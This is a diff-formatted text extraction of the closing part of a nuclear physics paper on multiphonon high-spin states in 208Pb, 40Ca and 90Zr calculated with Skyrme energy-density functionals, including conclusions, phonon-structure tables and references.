+ a The ’bd’ and ’aab’ configurations have very close energies for
1404
+ the 8−
1405
+ 2 level; the same is also for 10−
1406
+ 2 .
1407
+ To keep full self-consistency of the method, we also per-
1408
+ formed calculations for 90Zr with the well known forces
1409
+ SLy4. It is interesting to note, that the self-consistent
1410
+ SLy4 results for many levels are rather close to the
1411
+ bas−0.44 values calculated with this increased π1g9/2 en-
1412
+ ergy.
1413
+ The result for 90Zr presented in the tables are in gen-
1414
+ eral acceptable, particularly, taking into account the high
1415
+ sensitivity to the EDF parameters. The most significant
1416
+ deviations are for the first excited 0+ and 2+ states, i.
1417
+ e. 0+
1418
+ 2 and 2+
1419
+ 1 , but these states have, probably, a large
1420
+ deformation. The experimental ratio
1421
+ E(4+
1422
+ 1 ) − E(0+
1423
+ 2 )
1424
+ E(2+
1425
+ 1 ) − E(0+
1426
+ 2 ) = 3.07
1427
+ (1)
1428
+ is very close to the rotational limit 3.33. The deformed
1429
+ states are beyond the scope of the model using the spher-
1430
+ ical basis but for completeness we include the 0+ levels
1431
+ of 90Zr in the table.
1432
+ At the same time, unlike 40Ca, the deformation mani-
1433
+ fested in the 0+
1434
+ 2 , 2+
1435
+ 1 and, may be, 4+
1436
+ 1 states in 90Zr is not
1437
+
1438
+ 7
1439
+ seen in the 6+
1440
+ 1 state, since the experimental ratio
1441
+ E(6+
1442
+ 1 ) − E(0+
1443
+ 2 )
1444
+ E(2+
1445
+ 1 ) − E(0+
1446
+ 2 ) = 3.93
1447
+ (2)
1448
+ is significantly less than the rotational value of 7.00. All
1449
+ the result for 90Zr, excluding 0+
1450
+ 2 and 2+
1451
+ 1 states, are in a
1452
+ better and sometimes in nice agreement with the data.
1453
+ One can expect that these results can serve as a guide-
1454
+ line for the search of the new states in 90Zr. For example,
1455
+ the 6+
1456
+ 1 , 7+
1457
+ 1 , and 8+
1458
+ 1 levels are a part of the ’aa’ multiplet
1459
+ where the 6+
1460
+ 1 and 8+
1461
+ 1 states have the experimental values
1462
+ of energies are 3.45–3.59 MeV, so there should be a state
1463
+ 7+, which has approximately the same energy and this
1464
+ state should be yrast. Therefore the experimental 5.060
1465
+ level is placed as the second 7+ state in Table V. The
1466
+ states 14+ and 16+ are a part of the ”aad” multiplet, so
1467
+ there must be a level 16+
1468
+ 1 that is close in energy to the
1469
+ level 14+ with E(14+) = 8.058 MeV. Therefore, 10.12584
1470
+ cannot be the yrast state of 16+; it’s either 2nd or 3rd
1471
+ state.
1472
+ IV.
1473
+ SUMMARY AND CONCLUSIONS
1474
+ In the paper, the self-consistent calculations of the
1475
+ structure and energies of the high-spin states in dou-
1476
+ bly magic 208Pb and 40Ca and in semi-magic 90Zr have
1477
+ been presented. The calculations were performed within
1478
+ the framework of the multiphonon model including the
1479
+ renormalized phonons in the harmonic approximation
1480
+ and based on the energy-density functional (EDF) of
1481
+ the Skyrme type. The basic elements of the theory, the
1482
+ phonons, are determined within the renormalized time-
1483
+ blocking approximation which is a non-linear version of
1484
+ the model of the beyond-RPA type.
1485
+ In 208Pb, the calculations have been performed for all
1486
+ the experimentally known levels of spins I ≥ 13 and,
1487
+ when there are no data, for all yrast and yrare states of
1488
+ 13 ≤ I ≤ 30. In 40Ca and 90Zr, the results have been ob-
1489
+ tained for all the experimentally known high-spin states
1490
+ which can be described within our approach based on the
1491
+ spherically-symmetric mean field. The results for 208Pb
1492
+ are in fairly well agreement with the experimental data
1493
+ despite the fact that no new fitting parameters in the
1494
+ underlying Skyrme EDF were introduced.
1495
+ The results
1496
+ for 40Ca and 90Zr are less satisfactory with respect to
1497
+ comparison with data, but in part it is explained by the
1498
+ parametrization of the Skyrme EDF used in all the cal-
1499
+ culations and adjusted previously to the properties of the
1500
+ excited states of 208Pb.
1501
+ The choice of the EDF is important in describing the
1502
+ multiphonon states because of their sensitivity to the pa-
1503
+ rameters of the EDF which affect the phonon’s energies.
1504
+ This is demonstrated in the case of 90Zr. A change in
1505
+ one phonon causes much more significant change in the
1506
+ n-phonon energy. At the same time, there are many high-
1507
+ spin states having rather simple structure in terms of the
1508
+ renormalized phonons. Therefore the energies of the mul-
1509
+ tiphonon states can be used as the additional fit data for
1510
+ adjustment of the parameters of the EDFs.
1511
+ Our results confirm the conclusion of Ref. [23] about
1512
+ importance of the use of the renormalized phonons in the
1513
+ description of the high-spin states. The renormalization
1514
+ reduces the phonon’s energies that in the most cases im-
1515
+ proves agreement with data.
1516
+ ACKNOWLEDGMENTS
1517
+ This work was supported by the Russian Foundation
1518
+ for Basic Research, project number 21-52-12035.
1519
+ This
1520
+ research was carried out using computational resources
1521
+ provided by the Computer Center of St. Petersburg State
1522
+ University.
1523
+ Appendix A: Phonons
1524
+ Structure and energies of the phonons used in the cal-
1525
+ culations of the multiphonon states in 208Pb are shown
1526
+ in Table VII for the SV-bas−0.44 Skyrme parameter set.
1527
+ Here, the last two columns show the energies of the RPA
1528
+ and RenTBA (renormalized) phonons. The letters a, b,
1529
+ c, ... denote multiplets of phonons having approximately
1530
+ the same structure.
1531
+ Tables VIII and IX show the structure and energies of
1532
+ the phonons for 40Ca and 90Zr, respectively.
1533
+
1534
+ 8
1535
+ TABLE VII.
1536
+ Structure and energy (in MeV) of some phonons appearing in the n-phonon states of 208Pb. The last three
1537
+ columns show the experimental data [38, 41] and the energies of the RPA and RenTBA (renormalized) phonons. The letters
1538
+ a, b, c, ... denote multiplets of phonons having approximately the same structure.
1539
+
1540
+ Configuration
1541
+ E[MeV]
1542
+ Exp.
1543
+ RPA
1544
+ RenTBA
1545
+ a
1546
+ 3−
1547
+ 1
1548
+ ν 2g9/2 3p3/2
1549
+ −1 21% + π 1h9/2 2d3/2
1550
+ −1 20% + . . .
1551
+ 2.614
1552
+ 3.10
1553
+ 2.87
1554
+ b
1555
+ 2+
1556
+ 1
1557
+ ν 2g9/2 1i13/2
1558
+ −1 63% + π 2f7/2 1h11/2
1559
+ −1 19%
1560
+ 4.086
1561
+ 4.42
1562
+ 4.01
1563
+ 4+
1564
+ 1
1565
+ ν 2g9/2 1i13/2
1566
+ −1 58% + π 1h9/2 1h11/2
1567
+ −1 16%
1568
+ 4.324
1569
+ 4.80
1570
+ 4.31
1571
+ 6+
1572
+ 1
1573
+ ν 2g9/2 1i13/2
1574
+ −1 64% + π 1h9/2 1h11/2
1575
+ −1 18%
1576
+ 4.424
1577
+ 5.13
1578
+ 4.56
1579
+ c
1580
+ 5+
1581
+ 1
1582
+ ν 2g9/2 1i13/2
1583
+ −1 99%
1584
+ 4.962
1585
+ 5.36
1586
+ 4.69
1587
+ 7+
1588
+ 1
1589
+ ν 2g9/2 1i13/2
1590
+ −1 98%
1591
+ 4.867
1592
+ 5.36
1593
+ 4.68
1594
+ 8+
1595
+ 1
1596
+ ν 2g9/2 1i13/2
1597
+ −1 92%
1598
+ 4.611
1599
+ 5.31
1600
+ 4.66
1601
+ 9+
1602
+ 1
1603
+ ν 2g9/2 1i13/2
1604
+ −1 99%
1605
+ 5.010
1606
+ 5.39
1607
+ 4.70
1608
+ 10+
1609
+ 1
1610
+ ν 2g9/2 1i13/2
1611
+ −1 98%
1612
+ 4.895
1613
+ 5.34
1614
+ 4.65
1615
+ 11+
1616
+ 1
1617
+ ν 2g9/2 1i13/2
1618
+ −1 100%
1619
+ 5.235
1620
+ 5.54
1621
+ 4.85
1622
+ d
1623
+ 4−
1624
+ 1
1625
+ ν 2g9/2 3p1/2
1626
+ −1 98%
1627
+ 3.475
1628
+ 4.15
1629
+ 3.65
1630
+ 5−
1631
+ 1
1632
+ ν 2g9/2 3p1/2
1633
+ −1 70% + π 1h9/2 3s1/2
1634
+ −1 18%
1635
+ 3.198
1636
+ 3.92
1637
+ 3.51
1638
+ e
1639
+ 4−
1640
+ 2
1641
+ π 1h9/2 3s1/2
1642
+ −1 99%
1643
+ 3.947
1644
+ 4.36
1645
+ 3.93
1646
+ 5−
1647
+ 2
1648
+ π 1h9/2 3s1/2
1649
+ −1 70% + ν 2g9/2 3p1/2
1650
+ −1 24%
1651
+ 3.708
1652
+ 4.29
1653
+ 3.85
1654
+ f
1655
+ 5−
1656
+ 3
1657
+ ν 2g9/2 3p3/2
1658
+ −1 48% + π 1h9/2 2d3/2
1659
+ −1 28%
1660
+ 3.961
1661
+ 4.73
1662
+ 4.21
1663
+ g
1664
+ 6−
1665
+ 2
1666
+ π 1h9/2 2d3/2
1667
+ −1 83%
1668
+ 4.206
1669
+ 5.05
1670
+ 4.58
1671
+ h
1672
+ 6−
1673
+ 3
1674
+ ν 2g9/2 2f5/2
1675
+ −1 79%
1676
+ 4.383
1677
+ 5.14
1678
+ 4.52
1679
+ 7−
1680
+ 1
1681
+ ν 2g9/2 2f5/2
1682
+ −1 97%
1683
+ 4.037
1684
+ 5.41
1685
+ 4.75
1686
+ i
1687
+ 7−
1688
+ 2
1689
+ ν 1i11/2 3p3/2
1690
+ −1 96%
1691
+ 4.680
1692
+ 6.00
1693
+ 5.44
1694
+ j
1695
+ 8−
1696
+ 1
1697
+ ν 1i11/2 2f5/2
1698
+ −1 99%
1699
+ 4.919
1700
+ 6.29
1701
+ 5.70
1702
+ k
1703
+ 8+
1704
+ 2
1705
+ π 1h9/2 1h11/2
1706
+ −1 76%
1707
+ 4.861
1708
+ 5.74
1709
+ 5.15
1710
+ 9+
1711
+ 2
1712
+ π 1h9/2 1h11/2
1713
+ −1 99%
1714
+ 5.162
1715
+ 5.73
1716
+ 5.15
1717
+ 10+
1718
+ 2
1719
+ π 1h9/2 1h11/2
1720
+ −1 79%
1721
+ 5.069
1722
+ 6.11
1723
+ 5.53
1724
+ l
1725
+ 9+
1726
+ 3
1727
+ ν 1i11/2 1i13/2
1728
+ −1 98%
1729
+ 5.327
1730
+ 6.48
1731
+ 5.82
1732
+ 10+
1733
+ 3
1734
+ ν 1i11/2 1i13/2
1735
+ −1 82% + π 1h9/2 1h11/2
1736
+ −1 18%
1737
+ 5.537
1738
+ 6.72
1739
+ 6.01
1740
+ 11+
1741
+ 2
1742
+ ν 1i11/2 1i13/2
1743
+ −1 100%
1744
+ 5.750
1745
+ 6.46
1746
+ 5.80
1747
+ 12+
1748
+ 1
1749
+ ν 1i11/2 1i13/2
1750
+ −1 100%
1751
+ 5.864
1752
+ 7.05
1753
+ 6.37
1754
+ m
1755
+ 9+
1756
+ 4
1757
+ π 2f7/2 1h11/2
1758
+ −1 94%
1759
+ 5.901
1760
+ 6.69
1761
+ 5.79
1762
+ o
1763
+ 7−
1764
+ 6
1765
+ π 1i13/2 1h11/2
1766
+ −1 75% + ν 1j15/2 1i13/2
1767
+ −1 21% , X1 > 0, X2 > 0
1768
+ 7.48
1769
+ 6.51
1770
+ 9−
1771
+ 1
1772
+ π 1i13/2 1h11/2
1773
+ −1 99%
1774
+ 6.861
1775
+ 7.51
1776
+ 6.56
1777
+ 11−
1778
+ 1
1779
+ π 1i13/2 1h11/2
1780
+ −1 96%
1781
+ 7.48
1782
+ 6.52
1783
+ p
1784
+ 8−
1785
+ 2
1786
+ π 1i13/2 1h11/2
1787
+ −1 59% + ν 1j15/2 1i13/2
1788
+ −1 37% , X1 > 0, X2 > 0
1789
+ 5.836
1790
+ 7.33
1791
+ 6.40
1792
+ 10−
1793
+ 1
1794
+ π 1i13/2 1h11/2
1795
+ −1 53% + ν 1j15/2 1i13/2
1796
+ −1 47% , X1 > 0, X2 > 0
1797
+ 6.283
1798
+ 7.39
1799
+ 6.42
1800
+ q
1801
+ 12−
1802
+ 1
1803
+ ν 1j15/2 1i13/2
1804
+ −1 68% + π 1i13/2 1h11/2
1805
+ −1 32%
1806
+ 6.435
1807
+ 7.52
1808
+ 6.49
1809
+ r
1810
+ 11−
1811
+ 2
1812
+ ν 1j15/2 1i13/2
1813
+ −1 96%
1814
+ 7.60
1815
+ 6.50
1816
+ 13−
1817
+ 1
1818
+ ν 1j15/2 1i13/2
1819
+ −1 100%
1820
+ 7.57
1821
+ 6.47
1822
+ 14−
1823
+ 1
1824
+ ν 1j15/2 1i13/2
1825
+ −1 100%
1826
+ 6.743
1827
+ 8.02
1828
+ 6.81
1829
+ s
1830
+ 12−
1831
+ 2
1832
+ π 1i13/2 1h11/2
1833
+ −1 68% + ν 1j15/2 1i13/2
1834
+ −1 32% , X1 > 0, X2 < 0
1835
+ 7.061
1836
+ 8.06
1837
+ 6.92
1838
+ t
1839
+ 6−
1840
+ 4
1841
+ ν 1i11/2 3p1/2
1842
+ −1 82%
1843
+ 4.481
1844
+ 5.21
1845
+ 4.72
1846
+ u
1847
+ 8+
1848
+ 3
1849
+ ν 1j15/2 3p1/2
1850
+ −1 83%
1851
+ 5.093
1852
+ 6.19
1853
+ 5.32
1854
+ v
1855
+ 12+
1856
+ 2
1857
+ ν 1j15/2 1h9/2
1858
+ −1 83%
1859
+ a
1860
+ 10.37
1861
+ 8.95
1862
+ a The 12+
1863
+ 2 state has a 2-phonon confuguration and therefore its energy should not be compared with the 1-phonon energy.
1864
+
1865
+ 9
1866
+ TABLE VIII. The same as in Table VII but for 40Ca. The experimental data are taken from Ref. [21].
1867
+
1868
+ Configuration
1869
+ E[MeV]
1870
+ Exp.
1871
+ RPA
1872
+ RenTBA
1873
+ a
1874
+ 3−
1875
+ 1
1876
+ π 1f7/2 1d3/2
1877
+ −1 37% + ν 1f7/2 1d3/2
1878
+ −1 30% + . . . , X1 > 0, X2 > 0
1879
+ 3.737
1880
+ 3.58
1881
+ 3.38
1882
+ b
1883
+ 3−
1884
+ 2
1885
+ π 1f7/2 1d3/2
1886
+ −1 52% + ν 1f7/2 1d3/2
1887
+ −1 29% , X1 > 0, X2 < 0
1888
+ 6.160
1889
+ 5.58
1890
+ 5.25
1891
+ c
1892
+ 4−
1893
+ 1
1894
+ π 1f7/2 1d3/2
1895
+ −1 97%
1896
+ 5.613
1897
+ 5.17
1898
+ 4.87
1899
+ d
1900
+ 5−
1901
+ 1
1902
+ π 1f7/2 1d3/2
1903
+ −1 60% + ν 1f7/2 1d3/2
1904
+ −1 39% , X1 > 0, X2 > 0
1905
+ 4.491
1906
+ 5.33
1907
+ 5.00
1908
+ 2−
1909
+ 1
1910
+ π 1f7/2 1d3/2
1911
+ −1 64% + ν 1f7/2 1d3/2
1912
+ −1 36% , X1 > 0, X2 > 0
1913
+ 6.025
1914
+ 5.67
1915
+ 5.33
1916
+ e
1917
+ 4−
1918
+ 2
1919
+ ν 1f7/2 1d3/2
1920
+ −1 96%
1921
+ 5.45
1922
+ 5.12
1923
+ f
1924
+ 2−
1925
+ 2
1926
+ ν 1f7/2 1d3/2
1927
+ −1 61% + π 1f7/2 1d3/2
1928
+ −1 34% , X1 > 0, X2 < 0
1929
+ 6.750
1930
+ 6.71
1931
+ 6.29
1932
+ 5−
1933
+ 2
1934
+ ν 1f7/2 1d3/2
1935
+ −1 59% + π 1f7/2 1d3/2
1936
+ −1 38% , X1 > 0, X2 < 0
1937
+ 6.938
1938
+ 6.81
1939
+ 6.37
1940
+ i
1941
+ 3−
1942
+ 3
1943
+ ν 1f7/2 1d3/2
1944
+ −1 35% + ν 1f7/2 2s1/2
1945
+ −1 33% + . . . , X1 > 0, X2 > 0
1946
+ 6.285
1947
+ 6.02
1948
+ 5.69
1949
+ j
1950
+ 3−
1951
+ 4
1952
+ ν 1f7/2 2s1/2
1953
+ −1 44% + π 1f7/2 2s1/2
1954
+ −1 35% + . . . , X1 > 0, X2 < 0
1955
+ 6.582
1956
+ 7.55
1957
+ 7.14
1958
+ k
1959
+ 3−
1960
+ 5
1961
+ π 2p3/2 1d3/2
1962
+ −1 57% + ν 2p3/2 1d3/2
1963
+ −1 36% , X1 > 0, X2 > 0
1964
+ 7.623
1965
+ 8.08
1966
+ 7.45
1967
+ l
1968
+ 1−
1969
+ 1
1970
+ π 2p3/2 1d3/2
1971
+ −1 55% + ν 2p3/2 1d3/2
1972
+ −1 25% , X1 > 0, X2 > 0
1973
+ 5.903
1974
+ 8.25
1975
+ 7.63
1976
+ TABLE IX.
1977
+ The same as in Table VII but for 90Zr.
1978
+ The calculation values are given for the SLy4 parameter set.
1979
+ The
1980
+ experimental data are taken from Refs. [18, 40].
1981
+
1982
+ Configuration
1983
+ E[MeV]
1984
+
1985
+ Configuration
1986
+ E[MeV]
1987
+ Exp.
1988
+ RPA
1989
+ RenTBA
1990
+ Exp.
1991
+ RPA
1992
+ RenTBA
1993
+ a
1994
+ 4−
1995
+ 1
1996
+ π 1g9/2 2p1/2
1997
+ −1 100%
1998
+ 2.74
1999
+ 2.49
2000
+ 2.26
2001
+ 5−
2002
+ 1
2003
+ π 1g9/2 2p1/2
2004
+ −1 100%
2005
+ 2.32
2006
+ 2.20
2007
+ 2.02
2008
+ b
2009
+ 3−
2010
+ 1
2011
+ π 1g9/2 2p3/2
2012
+ −1 88%
2013
+ 2.75
2014
+ 3.09
2015
+ 2.88
2016
+ 4−
2017
+ 2
2018
+ π 1g9/2 2p3/2
2019
+ −1 98%
2020
+ 4.22
2021
+ 4.22
2022
+ 3.78
2023
+ 5−
2024
+ 2
2025
+ π 1g9/2 2p3/2
2026
+ −1 99%
2027
+ 3.96
2028
+ 4.10
2029
+ 3.66
2030
+ 6−
2031
+ 1
2032
+ π 1g9/2 2p3/2
2033
+ −1 98%
2034
+ 4.23
2035
+ 4.18
2036
+ 3.76
2037
+ c
2038
+ 2−
2039
+ 1
2040
+ π 1g9/2 1f5/2
2041
+ −1 99%
2042
+ 5.36
2043
+ 4.84
2044
+ 3−
2045
+ 2
2046
+ π 1g9/2 1f5/2
2047
+ −1 91%
2048
+ 4.81
2049
+ 4.40
2050
+ 3.96
2051
+ 4−
2052
+ 3
2053
+ π 1g9/2 1f5/2
2054
+ −1 98%
2055
+ 4.54
2056
+ 4.56
2057
+ 4.10
2058
+ 5−
2059
+ 3
2060
+ π 1g9/2 1f5/2
2061
+ −1 99%
2062
+ 4.30
2063
+ 4.34
2064
+ 3.87
2065
+ 6−
2066
+ 2
2067
+ π 1g9/2 1f5/2
2068
+ −1 97%
2069
+ 4.39
2070
+ 3.95
2071
+ 7−
2072
+ 1
2073
+ π 1g9/2 1f5/2
2074
+ −1 99%
2075
+ 4.37
2076
+ 4.41
2077
+ 4.06
2078
+ d
2079
+ 2+
2080
+ 1
2081
+ ν 2d5/2 1g9/2
2082
+ −1 97%
2083
+ 4.67
2084
+ 4.31
2085
+ 3+
2086
+ 1
2087
+ ν 2d5/2 1g9/2
2088
+ −1 99%
2089
+ 5.46
2090
+ 4.95
2091
+ 4+
2092
+ 1
2093
+ ν 2d5/2 1g9/2
2094
+ −1 99%
2095
+ 5.16
2096
+ 4.70
2097
+ 5+
2098
+ 1
2099
+ ν 2d5/2 1g9/2
2100
+ −1 99%
2101
+ 4.87
2102
+ 5.41
2103
+ 4.89
2104
+ 6+
2105
+ 1
2106
+ ν 2d5/2 1g9/2
2107
+ −1 100%
2108
+ 5.40
2109
+ 4.88
2110
+ 7+
2111
+ 1
2112
+ ν 2d5/2 1g9/2
2113
+ −1 100%
2114
+ 5.21
2115
+ 4.75
2116
+ h
2117
+ 2+
2118
+ 2
2119
+ ν 1g7/2 1g9/2
2120
+ −1 97%
2121
+ 8.58
2122
+ 8.07
2123
+ [1] M. J. A. de Voigt, J. Dudek,
2124
+ and Z. Szyma´nski, Rev.
2125
+ Mod. Phys. 55, 949 (1983).
2126
+ [2] J.
2127
+ X.
2128
+ Saladin,
2129
+ R.
2130
+ A.
2131
+ Sorensen,
2132
+ and
2133
+ C.
2134
+ M.
2135
+ Vincent,
2136
+ High
2137
+ Spin
2138
+ Physics
2139
+ and
2140
+ Gamma-
2141
+ Soft
2142
+ Nuclei
2143
+ (WORLD
2144
+ SCIENTIFIC,
2145
+ 1991)
2146
+ https://www.worldscientific.com/doi/pdf/10.1142/1242.
2147
+ [3] D. Ward and P. Fallon, “High spin properties of atomic
2148
+ nuclei,” in Advances in Nuclear Physics, edited by J. W.
2149
+ Negele and E. W. Vogt (Springer US, Boston, MA, 2001)
2150
+ pp. 167–291.
2151
+ [4] J. Meng, S. Q. Zhang,
2152
+ and P. W. Zhao, in Relativis-
2153
+ tic Density Functional for Nuclear Structure, Vol. Inter-
2154
+ national Review of Nuclear Physics – Vol. 10, edited by
2155
+ J. Meng (World Scientific Publishing Co. Pte. Ltd., 2016)
2156
+ pp. 355–412.
2157
+ [5] S. Frauendorf, Physica Scripta 93, 043003 (2018).
2158
+ [6] C. Petrache, P. Walker, S. Guo, Q. Chen, S. Frauen-
2159
+ dorf, Y. Liu, R. Wyss, D. Mengoni, Y. Qiang, A. Astier,
2160
+ E. Dupont, R. Li, B. Lv, K. Zheng, D. Bazzacco, A. Boso,
2161
+ A. Goasduff, F. Recchia, D. Testov, F. Galtarossa, G. Ja-
2162
+ worski, D. Napoli, S. Riccetto, M. Siciliano, J. Valiente-
2163
+ Dobon, M. Liu, X. Zhou, J. Wang, C. Andreoiu, F. Gar-
2164
+ cia, K. Ortner, K. Whitmore, T. Back, B. Cederwall,
2165
+ E. Lawrie, I. Kuti, D. Sohler, J. Timar, T. Marchlewski,
2166
+ J. Srebrny, and A. Tucholski, Physics Letters B 795, 241
2167
+ (2019).
2168
+ [7] V. Kumar and P. C. Srivastava, Nuclear Physics A 1002,
2169
+ 121989 (2020).
2170
+
2171
+ 10
2172
+ [8] A. V. Afanasjev, “Model for independent particle mo-
2173
+ tion,” in Handbook of Nuclear Physics, edited by I. Tani-
2174
+ hata, H. Toki,
2175
+ and T. Kajino (Springer Nature Singa-
2176
+ pore, Singapore, 2022) pp. 1–40.
2177
+ [9] K. Yoshida, Phys. Rev. C 105, 024318 (2022).
2178
+ [10] D. Rudolph, C. Baktash, M. J. Brinkman, E. Caurier,
2179
+ D. J. Dean, M. Devlin, J. Dobaczewski, P.-H. Heenen,
2180
+ H.-Q. Jin, D. R. LaFosse, W. Nazarewicz, F. Nowacki,
2181
+ A. Poves, L. L. Riedinger, D. G. Sarantites, W. Satu�la,
2182
+ and C.-H. Yu, Phys. Rev. Lett. 82, 3763 (1999).
2183
+ [11] E. Ideguchi,
2184
+ D.
2185
+ G.
2186
+ Sarantites,
2187
+ W. Reviol,
2188
+ A.
2189
+ V.
2190
+ Afanasjev, M. Devlin, C. Baktash, R. V. F. Janssens,
2191
+ D. Rudolph, A. Axelsson, M. P. Carpenter, A. Galindo-
2192
+ Uribarri, D. R. LaFosse, T. Lauritsen, F. Lerma, C. J.
2193
+ Lister, P. Reiter, D. Seweryniak, M. Weiszflog, and J. N.
2194
+ Wilson, Phys. Rev. Lett. 87, 222501 (2001).
2195
+ [12] T. Inakura, S. Mizutori, M. Yamagami,
2196
+ and K. Mat-
2197
+ suyanagi, Nuclear Physics A 710, 261 (2002).
2198
+ [13] E. Caurier, J. Men´endez, F. Nowacki,
2199
+ and A. Poves,
2200
+ Phys. Rev. C 75, 054317 (2007).
2201
+ [14] Y. Chiba and M. Kimura, Phys. Rev. C 89, 054313
2202
+ (2014).
2203
+ [15] R. Broda, R. V. F. Janssens, L. W. Iskra, J. Wrzesinski,
2204
+ B. Fornal, M. P. Carpenter, C. J. Chiara, N. Cieplicka-
2205
+ Ory´nczak, C. R. Hoffman, F. G. Kondev, W. Kr´olas,
2206
+ T. Lauritsen, Z. Podolyak, D. Seweryniak, C. M. Shand,
2207
+ B. Szpak, W. B. Walters, S. Zhu,
2208
+ and B. A. Brown,
2209
+ Phys. Rev. C 95, 064308 (2017).
2210
+ [16] S.
2211
+ Sakai,
2212
+ K.
2213
+ Yoshida,
2214
+ and
2215
+ M.
2216
+ Matsuo,
2217
+ Progress
2218
+ of
2219
+ Theoretical
2220
+ and
2221
+ Experimental
2222
+ Physics
2223
+ 2020
2224
+ (2020),
2225
+ 10.1093/ptep/ptaa071,
2226
+ 063D02,
2227
+ https://academic.oup.com/ptep/article-
2228
+ pdf/2020/6/063D02/33424844/ptaa071.pdf.
2229
+ [17] F. Wang, Z. Shi,
2230
+ and X. W. Xia, Phys. Rev. C 102,
2231
+ 014321 (2020).
2232
+ [18] P. Dey, D. Negi, R. Palit, P. C. Srivastava, M. S. R.
2233
+ Laskar, B. Das, F. S. Babra, S. Bhattacharya, B. Das,
2234
+ K. R. Devi, R. Gala, U. Garg, S. S. Ghugre, E. Ideguchi,
2235
+ S. Kumar, A. Kundu, G. Mukherjee, S. Muralithar,
2236
+ S. Nag, S. Nandi, Neelam, M. K. Raja, R. Raut,
2237
+ R. Santra, A. Sharma, S. Sihotra, A. K. Singh, R. P.
2238
+ Singh, and T. Trivedi, Phys. Rev. C 105, 044307 (2022).
2239
+ [19] E. K. Warburton, J. W. Olness, C. J. Lister, R. W.
2240
+ Zurm¨uhle,
2241
+ and J. A. Becker, Phys. Rev. C 31, 1184
2242
+ (1985).
2243
+ [20] H. Wang, K.-Y. Ma, S.-Y. Liu,
2244
+ and J.-B. Lu, Chinese
2245
+ Physics C 45, 094106 (2021).
2246
+ [21] J. Chen, Nuclear Data Sheets 140, 1 (2017).
2247
+ [22] M. Oi, Phys. Rev. C 76, 044308 (2007).
2248
+ [23] N. Lyutorovich, V. Tselyaev, J. Speth, G. Martinez-
2249
+ Pinedo, K. Langanke,
2250
+ and P.-G. Reinhard, Phys. Rev.
2251
+ C 105, 014327 (2022).
2252
+ [24] V. Tselyaev, N. Lyutorovich, J. Speth, and P.-G. Rein-
2253
+ hard, Phys. Rev. C 97, 044308 (2018).
2254
+ [25] A. I. Vdovin and V. G. Soloviev, Sov. J. Part. Nucl. 14,
2255
+ 99 (1983).
2256
+ [26] V. V. Voronov and V. G. Soloviev, Sov. J. Part. Nucl.
2257
+ 14, 583 (1983).
2258
+ [27] V. G. Soloviev, Theory of Atomic Nuclei: Quasiparticles
2259
+ and Phonons (Institute of Physics, Bristol and Philadel-
2260
+ phia, 1992).
2261
+ [28] C. A. Bertulani and V. Yu. Ponomarev, Phys. Rep. 321,
2262
+ 139 (1999).
2263
+ [29] N. Van Giai, C. Stoyanov, and V. Voronov, Phys. Rev.
2264
+ C 57, 1204 (1998).
2265
+ [30] A. P. Severyukhin, S. ˚Aberg, N. N. Arsenyev, and R. G.
2266
+ Nazmitdinov, Phys. Rev. C 98, 044319 (2018).
2267
+ [31] F. Andreozzi, F. Knapp, N. Lo Iudice, A. Porrino, and
2268
+ J. Kvasil, Phys. Rev. C 75, 044312 (2007).
2269
+ [32] D. Bianco, F. Knapp, N. Lo Iudice, F. Andreozzi,
2270
+ and
2271
+ A. Porrino, Phys. Rev. C 85, 014313 (2012).
2272
+ [33] G. De Gregorio, F. Knapp, N. Lo Iudice, and P. Vesel´y,
2273
+ Phys. Rev. C 93, 044314 (2016).
2274
+ [34] E. Litvinova, Phys. Rev. C 91, 034332 (2015).
2275
+ [35] V. Tselyaev, N. Lyutorovich, J. Speth, and P.-G. Rein-
2276
+ hard, Phys. Rev. C 102, 064319 (2020).
2277
+ [36] N. Lyutorovich, V. Tselyaev, J. Speth, S. Krewald, and
2278
+ P.-G. Reinhard, Phys. At. Nucl. 79, 868 (2016).
2279
+ [37] P.
2280
+ Kl¨upfel,
2281
+ J.
2282
+ Erler,
2283
+ P.
2284
+ .
2285
+ G.
2286
+ Reinhard,
2287
+ and
2288
+ J.
2289
+ A.
2290
+ Maruhn,
2291
+ Eur.
2292
+ Phys.
2293
+ J.
2294
+ A
2295
+ 37,
2296
+ 343
2297
+ (2008),
2298
+ http://www.arxiv.org/abs/0804.340.
2299
+ [38] M. Martin, Nuclear Data Sheets 108, 1583 (2007).
2300
+ [39] A. Heusler, Journal of Physics: Conference Series 1643,
2301
+ 012137 (2020).
2302
+ [40] S. Basu and E. Mccutchan, Nuclear Data Sheets 165, 1
2303
+ (2020).
2304
+ [41] A. Heusler, R. V. Jolos, T. Faestermann, R. Herten-
2305
+ berger, H.-F. Wirth, and P. von Brentano, Phys. Rev. C
2306
+ 93, 054321 (2016).
2307
+
99FAT4oBgHgl3EQfqB0k/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
CNE2T4oBgHgl3EQfnwjC/content/tmp_files/2301.04012v1.pdf.txt ADDED
@@ -0,0 +1,1756 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
